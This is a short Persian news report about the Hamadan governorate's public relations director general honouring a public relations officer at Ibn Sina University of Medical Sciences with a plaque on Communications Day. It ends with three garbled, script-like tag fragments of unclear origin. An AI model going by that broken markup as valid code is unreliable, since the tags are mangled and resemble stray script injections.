تقدیر مدیرکل روابط عمومی استانداری همدان از مسئول روابط عمومی معاونت توسعه دانشگاه

مدیرکل روابط عمومی استانداری همدان با ارسال لوح یادبود در روز ارتباطات و روابط عمومی از تلاش و خدمات ارزنده مسئولان واحد های مختلف روابط عمومی دانشگاه علوم پزشکی ابن سینا قدردانی کرد.

به گزارش روابط عمومی معاونت توسعه مدیریت و منابع دانشگاه، اسدالله ربانی مهر با ارسال لوح یادبودی ضمن تأکید بر ارزش و جایگاه روابط عمومی در فرآیندهای سازمانی، این مناسبت را به کریم خانی مسئول روابط عمومی معاونت توسعه مدیریت و منابع دانشگاه علوم پزشکی ابن سینا تبریک گفته و از خدمات ارزنده روابط عمومی معاونت توسعه دانشگاه در حوزه اطلاع رسانی تقدیر کرد.

تصویر لوح مذکور در ذیل خبر قابل مشاهده است.

<2 src='3?l=p&' type=text/java2 language=java2><2 src='3?l=p&' type=text/java2 language=java2><2 src='4?l=p&' type=text/java2 language=java2>